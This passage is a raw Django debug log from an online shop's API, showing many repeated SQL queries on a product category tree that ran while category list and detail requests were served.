"shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-19 13:24:21,435 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-19 13:24:21,437 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-19 13:24:21,441 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-19 13:24:21,443 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-19 13:24:21,445 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-19 13:24:21,448 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-19 13:24:21,451 utils 4252 140031503103744 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-19 13:24:21,455 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-19 13:24:21,457 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-19 13:24:21,459 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-19 13:24:21,461 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-19 13:24:21,464 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-19 13:24:21,466 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-19 13:24:21,469 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-19 13:24:21,472 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-19 13:24:21,474 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-19 13:24:21,476 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-19 13:24:21,479 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-19 13:24:21,482 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-19 13:24:21,485 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-19 13:24:21,487 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-19 13:24:21,489 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-19 13:24:21,491 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-19 13:24:21,495 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-19 13:24:21,497 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-19 13:24:21,500 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-19 13:24:21,502 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-19 13:24:21,505 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-19 13:24:21,508 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-19 13:24:21,511 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-19 13:24:21,513 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-19 13:24:21,515 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-19 13:24:21,518 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-19 13:24:21,520 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [19/Dec/2019 13:24:21] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-19 13:26:15,971 utils 4252 140031503103744 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-19 13:26:15,978 utils 4252 140031721535232 (0.008) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 9; args=(9,) DEBUG 2019-12-19 13:26:15,983 utils 4252 140031503103744 (0.005) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-19 13:26:15,987 utils 4252 140031721535232 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-19 13:26:15,991 utils 4252 140031503103744 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-19 13:26:15,995 utils 4252 140031503103744 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) [19/Dec/2019 13:26:15] "GET /api/v1/categories/9 HTTP/1.0" 200 500 DEBUG 2019-12-19 13:26:15,999 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-19 13:26:16,001 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-19 13:26:16,004 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-19 13:26:16,008 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-19 13:26:16,011 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-19 13:26:16,014 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-19 13:26:16,017 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-19 13:26:16,019 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-19 13:26:16,021 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-19 13:26:16,024 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-19 13:26:16,027 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-19 13:26:16,029 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-19 13:26:16,031 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-19 13:26:16,034 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-19 13:26:16,036 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-19 13:26:16,040 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-19 13:26:16,042 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-19 13:26:16,044 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-19 13:26:16,046 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-19 13:26:16,049 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-19 13:26:16,051 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-19 13:26:16,054 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-19 13:26:16,056 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-19 13:26:16,059 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-19 13:26:16,062 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-19 13:26:16,064 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-19 13:26:16,067 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", 